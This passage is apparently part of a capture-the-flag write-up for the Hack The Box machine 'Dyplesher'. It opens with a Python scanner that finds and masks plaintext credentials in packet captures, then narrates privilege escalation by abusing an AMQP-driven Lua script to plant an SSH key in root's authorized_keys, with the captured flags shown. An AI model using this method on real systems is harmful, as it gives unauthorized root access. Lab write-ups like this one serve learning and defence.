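        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:14 + total_len]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4                      # TCP header length in bytes
        payload = tcp[data_off:]
        if payload:
            yield src, sport, dst, dport, payload


JSON_PASSWORD = re.compile(rb'"password"\s*:\s*"([^"]*)"')
BASIC_AUTH = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def mask(secret: bytes) -> str:
    """Keep the first character only, so a report proves exposure without re-exposing the secret."""
    s = secret.decode("utf-8", "replace")
    return s[:1] + "*" * (len(s) - 1)


def find_plaintext_credentials(pcap: bytes) -> List[Dict[str, str]]:
    """Scan every TCP payload for JSON password fields and HTTP Basic credentials."""
    findings: List[Dict[str, str]] = []
    for src, sport, dst, dport, payload in tcp_payloads(pcap):
        flow = f"{src}:{sport} -> {dst}:{dport}"
        for m in JSON_PASSWORD.finditer(payload):
            findings.append({"flow": flow, "kind": "json-password", "secret": mask(m.group(1))})
        for m in BASIC_AUTH.finditer(payload):
            try:
                userpass = base64.b64decode(m.group(1), validate=True)
            except ValueError:
                continue                                   # not real base64, skip it
            user, _, pw = userpass.partition(b":")
            findings.append({"flow": flow, "kind": "http-basic",
                             "user": user.decode("utf-8", "replace"), "secret": mask(pw)})
    return findings


# Constructed loopback traffic: a JSON login, a Basic-auth request, and a harmless health check.
SAMPLE_PCAP = build_tcp_pcap([
    ("127.0.0.1", 45678, "127.0.0.1", 5000,
     b"POST /api/login HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/json\r\n\r\n"
     b'{"name":"testuser","email":"testuser@example.test","password":"Constructed1"}'),
    ("127.0.0.1", 45679, "127.0.0.1", 5000,
     b"GET /api/me HTTP/1.1\r\nHost: localhost\r\nAuthorization: Basic "
     + base64.b64encode(b"testuser:Constructed2") + b"\r\n\r\n"),
    ("127.0.0.1", 45680, "127.0.0.1", 5000, b"GET /healthz HTTP/1.1\r\nHost: localhost\r\n\r\n"),
])

if __name__ == "__main__":
    for f in find_plaintext_credentials(SAMPLE_PCAP):
        print(f)
```

Run against a real capture by replacing SAMPLE_PCAP with the bytes of a file written by tshark -F pcap; the parser deliberately refuses pcapng and non-Ethernet link types rather than misreading them. The fix the findings point at is on the services, not the capture tool: loopback traffic between local services should carry no reusable passwords at all, and the wireshark group should be limited to people whose job is packet capture.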

MinatoTW@dyplesher:~$ su felamos
Password: 
felamos@dyplesher:/home/MinatoTW$ cd
felamos@dyplesher:~$ ls
cache  snap  user.txt  yuntao
felamos@dyplesher:~$ cat user.txt 
8c371079e970d216f0149bdefa280000
felamos@dyplesher:~$ id
uid=1000(felamos) gid=1000(felamos) groups=1000(felamos)
felamos@dyplesher:~$ 

We have user.txt. Now let's investigate how we can become root.

I did not find anything useful for privilege escalation as felamos or yuntao either, so I decided to use the pspy tool.

kali:~/htb/boxes/dyplesher# scp pspy64 felamos@dyplesher.htb:/home/felamos/
felamos@dyplesher.htb's password: 
pspy64                                          100% 3006KB   3.6MB/s   00:00    
root@kali:~/htb/boxes/dyplesher# 

pspy couldn't find anything, so I tried the ps -a command.

The process list shows a Lua script and an AMQP (Advanced Message Queuing Protocol) service; pika is the Python client library for AMQP. We have two different passwords for the yuntao user, and this user is the AMQP manager, so I prepared a script by looking at the following resources.

Reference-1
Reference-2

First, I made the Python script.

Secondly, we make the Lua script on the dyplesher machine.

To get root, we write our SSH public key into the Lua file. To do this, we first run the following command on the dyplesher machine to serve the Lua file over HTTP.
Then we run the script we created on our own machine.
The public key we prepared is then written to /root/.ssh/authorized_keys.

MinatoTW@dyplesher:~$ vi dcrx.lua
MinatoTW@dyplesher:~$ python3 -m http.server 1515
Serving HTTP on 0.0.0.0 port 1515 (http://0.0.0.0:1515/) ...
127.0.0.1 - - [11/Jun/2020 08:54:52] "GET /dcrx.lua HTTP/1.0" 200 -

root@kali:~/htb/boxes/dyplesher# ./betik.py 

It Worked… 🙂

root@kali:~/htb/boxes/dyplesher# ssh -i id_rsa root@dyplesher.htb
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 11 Jun 2020 08:56:37 AM UTC

  System load:  0.07              Processes:              254
  Usage of /:   6.9% of 97.93GB   Users logged in:        1
  Memory usage: 32%               IP address for ens33:   10.10.10.190
  Swap usage:   0%                IP address for docker0: 172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings


Last login: Sun May 24 03:33:34 2020
root@dyplesher:~# id
uid=0(root) gid=0(root) groups=0(root)
root@dyplesher:~# cat root.txt 
e623e92ffdefe369e3b7b955058e2feb
root@dyplesher:~# 

This machine was very fun and instructive. Thank you for reading and studying.
